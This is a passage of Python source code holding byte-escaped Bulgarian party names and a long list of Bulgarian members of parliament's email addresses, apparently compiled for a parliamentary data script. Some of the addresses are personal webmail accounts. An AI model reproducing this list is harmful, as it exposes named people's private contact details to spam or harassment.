\xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c']
force = [_.decode('utf-8') for _ in force]
force = map(canonical_party_name, force)
mail = ['aliosman.imamov@gmail.com', 'atanas.kambitov@parliament.bg', 'georgi.andonov@parliament.bg', 'georgi.ikonomov@parliament.bg', 'korneliya.ninova@parliament.bg', 'l.tatarski@parliament.bg, ltatarski@gmail.com', 'mitko.zahov@parliament.bg', 'musa.palev@parliament.bg', 'ognian.tetimov@parliament.bg', 'yanev@parliament.bg, y.yanev@parliament.bg', '', 'volen.siderov@parliament.bg', 'galina.mileva@parliament.bg', 'djevdet.chakarov@parliament.bg', 'dimitar.boychev@parliament.bg', 'DMustafa@parliament.bg', 'i.valkov@parliament.bg, ivalkovv@parliament.bg', 'penkoa@abv.bg,P.Atanasov@parliament.bg', 'P.Oresharski@parliament.bg', 'stoyan.ivanov@parliament.bg', 'stoyan.gyuzelev@parliament.bg', '', 'a.pantev@parliament.bg', 'daniela.petrova@parliament.bg', 'dimitar.karbov@parliament.bg', 'dimitar.atanasov@parliament.bg', 'emil.radev@parliament.bg', 'jordan.tsonev@parliament.bg', 'krasimir.petrov@parliament.bg', 'nikolay.kostadinov@parliament.bg', 'pavel.dimitrov@parliament.bg', 'svetoslav.nedelchev@parliament.bg', 'svilen.kraychev@parliament.bg', 'stanishev@parliament.bg', 'tsveta.georgieva@parliament.bg', 'boyko.velikov@parliament.bg', 'b.stoyanov@parliament.bg', 'vanyo.sharkov@parliament.bg', 'evgeni.stoev@parliament.bg', 'miroslav.petkov@parliament.bg', 'H.Hadjihasan@parliament.bg', 'hristo.hristov@parliament.bg', 'ts.tsvetanov@parliament.bg', '', 'vladimir.toshev@parliament.bg, vtoshev@gmail.com', 'k.petrova@parliament.bg', 'l.stanislavova@nt52.parliament.bg', 'mmikov@nt52.parliament.bg', 'Agov@parliament.bg', 'ventsislav.lakov@parliament.bg, vencilakov@abv.bg', 'gbojinov@parliament.bg', 'm.tagarinski@parliament.bg, mtg@dir.bg', '', 'nikolay.kotzev@parliament.bg, n.kocev@abv.bg', 'nikolay.rashev@parliament.bg', 'galina.bankovska@parliament.bg', 'ivan.todorov@parliament.bg', 'i.nikolov@parliament.bg', 'm.darakchieva@parliament.bg', 'tsvetomir.mihov@parliament.bg', 'valentin.ivanov@parliament.bg', 'vanya.doneva@parliament.bg', 'vvarbanov@parliament.bg', 'korman@parliament.bg', 'p.dimitrov@parliament.bg', 'rumen.ivanov@parliament.bg', 'svetomir.mihaylov@parliament.bg', 'ahmed.dogan@parliament.bg', '', 'n.ali@parliament.bg,nedzhmi.ali@parliament.bg', 'remzi.osman@parliament.bg', 'U.Tasim@parliament.bg', 'valentin.mikev@parliament.bg, v.mikev@abv.bg', 'd.chukarski@parliament.bg', 'emil.gushterov@parliament.bg', 'kiril.kalfin@parliament.bg', 'maya.manolova@parliament.bg', 'anatoliy.yordanov@parliament.bg', 'evgeniy.uzunov@parliament.bg', 'kiril.gumnerov@parliament.bg', 'mihail.nikolovski@parliament.bg', 'stanka.shaylekova@parliament.bg', 'b.petrova@parliament.bg', 'dimitar.avramov@parliament.bg', 'fidosova@gbg.bg', 'lyubomir.ivanov@parliament.bg', 'plamen.tsekov@parliament.bg', 'yanaki.stoilov@parliament.bg', 'angel.daskalov@parliament.bg', 'G.Pirinski@parliament.bg', 'georgi.petarneychev@parliament.bg', 'ginche.karaminova@parliament.bg, karaminova@abv.bg', 'delyan.peevski@parliament.bg', 'ivan.ivanov@parliament.bg', 'i.mihailova@parliament.bg', 'krasimira.simeonova@parliament.bg', 'nikola.belishki@parliament.bg', 'ANaydenov@parliament.bg', 'vladislav.dimitrov@parliament.bg', 'd.kolev@parliament.bg', 'i.sokolova@parliament.bg', 'peter.petrov@parliament.bg', 'G.Anastasov@parliament.bg', 'd.matov@parliament.bg', 'D.Chukolov@parliament.bg', 'ivelin.nikolov@parliament.bg', 'mithat.metin@parliament.bg', 'plamen.tachev@parliament.bg', 'rumen.petkov@parliament.bg', 'hristina.yancheva@parliament.bg', 'tsvetan.kostov@parliament.bg', 'Predsedatel@parliament.bg', 'velichka.shopova@parliament.bg', 'dimo.gyaurov@parliament.bg', 'z.georgiev@parliament.bg', 'zoya.georgieva@parliament.bg', '', 'kostadin.yazov@parliament.bg', 'menda.stoyanova@parliament.bg', 'pavel.shopov@parliament.bg', 'stefan.dedev@parliament.bg', 'Prof.St.Danailov@parliament.bg', 'georgi.plachkov@parliament.bg', 'dimitar.lazarov@parliament.bg', 'iliya.pashev@parliament.bg', 'jordan.bakalow@parliament.bg', 'm.hristova@parliament.bg', 'nikolay.petkov@parliament.bg', 'stoichkov@parliament.bg', 'petar.mutafchiev@parliament.bg', 'p.raeva@parliament.bg', 'silviya.hubenova@parliament.bg', 't.naimov@parliament.bg', 'belgin@parliament.bg', 'n.sahlim@parliament.bg', '', 'todor.dimitrov@parliament.bg', 'ademov@parliament.bg', '', 'daniela.mitkova@parliament.bg', 'desislava.atanasova@parliament.bg', 'emel.etem@parliament.bg', 'lyubomir.vladimirov@parliament.bg', 'M.Plugtschieva@parliament.bg', 'plamen.nunev@parliament.bg, paci_rousse@abv.bg', 'svetlana.angelova@parliament.bg', 'anton.kutev@parliament.bg', 'gyunay.sefer@parliament.bg', 'kamen.kostadinov@parliament.bg', 'tab61@parliament.bg', 'stefan.gospodinov@parliament.bg', 'asen.gagauzov@parliament.bg', 'desislava.taneva@parliament.bg', 'dian.chervenkondev@parliament.bg', 'kalina.krumova@parliament.bg', 'kdimitrov@parliament.bg', 'yuliana.koleva@parliament.bg', 'yanko.yankov@parliament.bg', 'arif.agush@parliament.bg', 'daniela.daritkova@parliament.bg', 'dimcho.mihalevski@parliament.bg', 'elin.andreev@parliament.bg', 'nikolay.melemov@parliament.bg, dermax@mail.bg', 'boris.grozdanov@parliament.bg', 'aleksandar.nenkov@parliament.bg', 'anna.yaneva@parliament.bg', 'semov@parliament.bg', 'valentin.nikolov@parliament.bg', 'dimitar.glavchev@parliament.bg', 'emanouela.spassova@parliament.bg', 'ivan.kostov@parliament.bg, dsb@nt14.parliament.bg', 'l.toshev@parliament.bg', 'rumen.ovcharov@parliament.bg', 'teodora.georgieva@parliament.bg', 'yavor.notev@parliament.bg', 'monika.panayotova@parliament.bg', 'veselin.metodiev@parliament.bg', 'genoveva.aleksieva@parliament.bg', 'dgajeva@abv.bg,denitsa.gadjeva@parliament.bg', 'dzhema.grozdanova@parliament.bg', '', 'LachezarBogomilov@parliament.bg', 'kornesov@parliament.bg', 'dimitrovmartin@parliament.bg', 'pkouroumbashev@parliament.bg', 'stoyan.mavrodiev@parliament.bg', 'krasimir.velchev@parliament.bg', 'a.radoslavov@parliament.bg', 'valentina.bogdanova@parliament.bg', '', 'dobroslav.dimitrov@parliament.bg', 'e.michaylova@parliament.bg', 'ivan.bozhilov@parliament.bg', 'ioana.kirova@parliament.bg', 'kamen.petkov@parliament.bg', 'k.cipov@parliament.bg', 'stanislav.ivanov@parliament.bg', 'daniel.georgiev@parliament.bg', 'dragomir.stoynev@parliament.bg', 'emil.dimitrov@parliament.bg', 'emil.ivanov@parliament.bg', 'kiril.dobrev@parliament.bg', 'pehlivanov@parliament.bg', 's.tanchev@parliament.bg', 'tsvetan.sichanov@parliament.bg', 'evgeniy.zhelev@parliament.bg', 'emil.karanikolov@parliament.bg', 'zhivko.todorov@parliament.bg', 'ivan.kolev@parliament.bg', 'ivan.n.ivanov@parliament.bg, dsbivanov@yahoo.com', 'lyutvi.mestan@parliament.bg', 'nedyalko.nedyalkov@parliament.bg', 'neli.kalneva@parliament.bg, neli_iva@abv.bg', 'petar.hlebarov@parliament.bg', 'spas.panchev@parliament.bg', 't.velikov@parliament.bg', 'erdoan.ahmedov@parliament.bg', 'kasim.dal@parliament.bg', 'lili.boyanova@parliament.bg', 'Takorov@parliament.bg', 'Kardjaliev@parliament.bg', 'G.Serbest@parliament.bg', 'delian.dobrev@parliament.bg', 'e.maslarova@parliament.bg', 'ivan.petrov@parliament.bg', 'ivo.dimov@parliament.bg', 'bat_slavko@abv.bg,stanislav.stanilov@parliament.bg', 'fani.hristova@parliament.bg', 'younal.loutfi@parliament.bg', 'georgi.kolev@parliament.bg', 'dimitar.dabov@parliament.bg', 'ivaylo.toshev@parliament.bg', 'krasimir.minchev@parliament.bg', 'h.bisserov@parliament.bg', 'tchetin@yahoo.com,tchetin.kazak@parliament.bg', 'aleksandar.stoykov@parliament.bg', 'anastas.anastasov@parliament.bg', 'atanas.merdjanov@parliament.bg', 'ognyan.peychev@parliament.bg', 'svetoslav.tonchev@parliament.bg', 'ivan.aleksiev@parliament.bg, aleksiev_ivan@abv.bg', 'vyara.petrova@parliament.bg', 'yanko.ivanov@parliament.bg', 'tsveta.karayancheva@parliament.bg, cveta_@abv.bg', 'stefani.mihaylova@parliament.bg', 'asparuh.stamenov@parliament.bg', 's.dukova@parliament.bg', 'antoniy.yordanov@parliament.bg', '', '', '', 'georgi.terziyski@.parliament.bg', 'r.s.stoilov@abv.bg', 'advvasilev@abv.bg', 'cem_dimitrova@abv.bg', 'r.danev@parliament.bg', 'yordan.andonov@parliament.bg', 'hamid.hamid@parliament.bg', 'diana.yordanova@parliament.bg', 'katya.koleva@parliament.bg', 'nedyalko.slavov@parliament.bg', 'petko.petkov@parliament.bg', 'plamen.roussev@parliament.bg', 'katya.chalakova@parliament.bg', 'vesselin.davidov@parliament.bg', '', 'liliya.hristova@parliament.bg', 'p.daskalov@parliament.bg', 'z.todorov@parliament.bg', 'v.angelov@parliament.bg', 'a.krustev@parliament.bg', 'ralitsa.todorova@parliament.bg', '', '', '', '', '', '', '', '', 'petar.dulev@parliament.bg', '', '', '', '', '', 'plamen.slavov@parliament.bg', '', '', '', '', '', 'RUMEN.GECHEV@parliament.bg', '', '', '', '', '', '', 'svetla.piralkova@parliament.bg', '', 'roumen.iontchev@parliament.bg', 'stefan.tanev@parliament.bg', '', '', '', '', 'stanislav.vladimirov@parliament.bg', 'spas.panchev@parliament.bg', '', 'smilyana.nitova@parliament.bg', 'siyana.fudulova@parliament.bg', '', '', '', 'todor.radulov@parliament.bg', '', 'tatyana.burudjieva@parliament.bg', '', 'tanyu.kiriakov@parliament.bg', 'strahil.angelov@parliament.bg', '', '', '', '', 'phillip.popov@parliament.bg', '', '', '', '', '', '', '', 'HRISTO.MONOV@parliament.bg', '', '', '', '', '', 'ALEXANDAR.PAUNOV@parliament.bg', '', '', '', '', 'yavor.kuiumjiev@parliament.bg', '', '', 'borislav.gutsanov@parliament.bg', 'boris.tsvetkov@parliament.bg', '', 'atanas.merdjanov@parliament.bg', 'Atanas.Zafirov@parliament.bg', '', 'anton.kutev@parliament.bg', '', '', '', '', '', '', 'vasil.antonov@parliament.bg', 'vanya.dobreva@parliament.bg', 'valeri.jablyanov@parliament.bg', 'valentina.bogdanova@parliament.bg', '', 'georgi.kadiev@parliament.bg', '', 'georgi.marcov@parliament.bg', '', '', '', '', '', '', '', '', '', '', '', 'georgi.gyokov@parliament.bg', 'G.Anastasov@parliament.bg', 'georgi.svilenski@parliament.bg', 'deniza.slateva@parliament.bg', '', '', '', 'dimitar.gorov@parliament.bg', '', '', '', 'deyan.dechev@parliament.bg', '', '', '', '', 'dora.yankova@parliament.bg', '', '', '', 'dobrin.danev@parliament.bg', 'dimcho.mihalevski@parliament.bg', 'dimitar.dabov@parliament.bg', '', '', '', '', 'Emil.Kostadinov@parliament.bg', '', '', 'emil.raynov@parliament.bg', '', '', '', 'zhelyo.boychev@parliament.bg', '', '', '', 'i.ivanov@parliament.bg', '', '', '', 'ivan.ibrishimov@parliament.bg', '', 'yordanka.yordanova@parliament.bg', 'yordan.mladenov@parliament.bg', '', 'yordan.stoykov@parliament.bg', '', '', 'iliya.batashki@parliament.bg', '', '', '', '', '', '', '', '', '', '', 'krasimir.murdzhev@parliament.bg', 'korneliya.ninova@parliament.bg', '', 'kiril.dobrev@parliament.bg', 'krasimir.yankov@parliament.bg', '', '', '', 'maya.manolova@parliament.bg', 'martin.zahariev@parliament.bg', 'mariana.boyadzhieva@parliament.bg', 'mariana.toteva@parliament.bg', '', '', 'lyubomir.petkov@parliament.bg', '', 'Predsedatel@parliament.bg', '', '', '', 'mincho.minchev@parliament.bg', 'Milko.BAGDASAROV@parliament.bg', 'milka.hristova@parliament.bg', '', 'mladen.cherveniakov@parliament.bg', '', 'nikolay.petev@parliament.bg', '', '', '', '', 'petar.kanev@parliament.bg', 'petar.mutafchiev@parliament.bg', 'pkouroumbashev@parliament.bg', '', '', '', '', 'nikolay.malinov@parliament.bg', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', 'ventsislav.lakov@parliament.bg, vencilakov@abv.bg', '', '', '', 'delian.dobrev@parliament.bg', '', '', '', '', '', '', '', '', '', '', 'lyubomir.vladimirov@parliament.bg', '', '', '', 'stanishev@parliament.bg', 'lambo.m@parliament.bg', '', '', 'yavor.notev@parliament.bg', 'yanaki.stoilov@parliament.bg', '', '', '', '', '', '', '', '', 'atanas.padev@parliament.bg', 'z.georgiev@parliament.bg', '', '', 'ekaterina.zayakova@parliament.bg', '', 'lazar.popov@parliament.bg', 'margarita.stoilova@parliament.bg', 'zhara.peneva@parliament.bg', 